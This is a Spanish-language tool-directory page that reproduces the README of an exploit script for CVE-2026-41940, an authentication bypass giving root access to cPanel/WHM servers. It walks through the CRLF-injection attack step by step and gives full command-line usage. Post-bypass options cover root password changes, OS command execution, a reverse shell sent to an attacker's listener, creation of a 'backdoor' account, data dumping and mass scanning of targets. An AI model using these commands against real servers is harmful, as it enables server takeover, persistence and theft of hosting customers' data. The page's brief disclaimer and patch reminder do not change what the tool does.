Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41940 — cPanel/WHM Bypass de Autenticación (Vulnerabilidad de Día Cero) | Kitploit
Herramientas/GitHubGitHub/christian93111/cve-2026-41940
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAutenticaciónAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM Bypass de Autenticación (Vulnerabilidad de Día Cero)

1029hace 4 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-41940: Bypass de Autenticación de cPanel/WHM (Objetivo Único y Múltiple)

Aviso legal: Este documento y el script asociado (exploit.py) se proporcionan estrictamente con fines educativos, investigación de seguridad y pruebas de penetración autorizadas. No utilice este software contra sistemas que no posea o para los cuales no tenga permiso explícito para probar.

Descripción general

exploit.py es un script que demuestra una vulnerabilidad de omisión de autenticación (CVE-2026-41940) en cPanel y WHM. La vulnerabilidad permite a un atacante no autenticado inyectar una sesión de root en el caché del demonio a través de un fallo de inyección CRLF, lo que finalmente otorga acceso a WHM a nivel de root sin requerir credenciales válidas.

Análisis de Vulnerabilidad y Flujo del Exploit

El exploit funciona aprovechando una vulnerabilidad de inyección CRLF (Retorno de Carro y Salto de Línea) dentro del mecanismo de manejo de Autenticación Básica, combinada con un fallo de propagación de sesión. El script automatiza el ataque en cuatro etapas:

  1. Generación de sesión previa a la autenticación: Se conecta a endpoints públicos de inicio de sesión (p. ej., /login/ o /cgi/login.cgi) para adquirir una cookie de sesión base no autenticada (whostmgrsession).
  2. Inyección CRLF: Envía un encabezado de Autenticación Básica manipulado que contiene un payload codificado en Base64, inyectando campos de sesión de root directamente en el caché de sesión de cpsrvd. La respuesta de redirección del servidor filtra el token de seguridad generado (cpsess).
  3. Propagación de sesión: La cookie de sesión cruda se envía a un endpoint autenticado de WHM, lo que provoca que do_token_denied propague la sesión falsificada en el caché del demonio, convirtiéndola en una sesión autenticada válida.
  4. Verificación: Accede a endpoints restringidos de la API de WHM (p. ej., /json-api/version) usando la sesión falsificada para confirmar el acceso a nivel de root.

Requisitos previos

  • Python 3.x
  • Librería requests
pip install requests

Uso

python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Argumentos

Selección de objetivo

ArgumentoDescripción
--target URLURL única de WHM (p. ej., https://target:2087)
--target-file FILEArchivo con objetivos (un ip:puerto por línea) — activa automáticamente el modo de comprobación

Opciones de red y núcleo

ArgumentoDescripción
--threads NHilos concurrentes para el modo multi-objetivo (predeterminado: 10)
--hostname HOSTAnular el encabezado Host — usar cuando la detección automática falla o da un nombre de host incorrecto
--timeout NTiempo de espera por solicitud en segundos (predeterminado: 15)
--retries NNúmero de reintentos en errores de red (predeterminado: 3)
--cookie-name NAMEForzar un nombre específico de cookie de sesión (se detecta automáticamente si se omite)
--no-verifySaltar la verificación de la Etapa 4 y continuar de todos modos

Opciones de explotación (post-bypass)

ArgumentoDescripción
--checkModo solo comprobación — verificar vulnerabilidad sin explotar (se activa automáticamente con --target-file)
--password PASSCambiar la contraseña de root a PASS
--api FUNCLlamar a una función específica de la API JSON de WHM
--api-params K=V,...Parámetros separados por comas para --api
--exec CMDEjecutar un comando del sistema operativo a través de scripts/run_script de WHM (fallback: rawexec)
--sessionGenerar una URL de inicio de sesión de un clic como root — abrir inmediatamente, el token expira rápido
--shellAbrir un shell interactivo de WHM (solo objetivo único)
--dumpVolcar información del servidor: versión, cuentas, zonas DNS, privilegios
--add-user USER PASS DOMAINCrear una nueva cuenta de alojamiento cPanel
--revshell LHOST LPORTEnviar una reverse shell bash a su listener

Opciones de salida

ArgumentoDescripción
--output FILEGuardar el token de sesión y detalles en un archivo JSON

Ejemplos

# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Comandos del Shell Interactivo

Cuando se usa --shell, están disponibles los siguientes comandos:

ComandoDescripción
api <function> [k=v ...]Llamar a una función JSON-API de WHM (p. ej., api version)
exec <command>Ejecutar un comando del sistema operativo a través de WHM (p. ej., exec id)
passwd <newpass>Cambiar la contraseña de root
dumpVolcar información del servidor
revshell <lhost> <lport>Enviar una reverse shell
add <user> <pass> <domain>Crear una cuenta de cPanel
save <path>Guardar la sesión actual en un archivo
exit / quitSalir del shell

Recordatorio

Actualice los parches de seguridad más recientes de cPanel/WHM de inmediato.

Descargar herramienta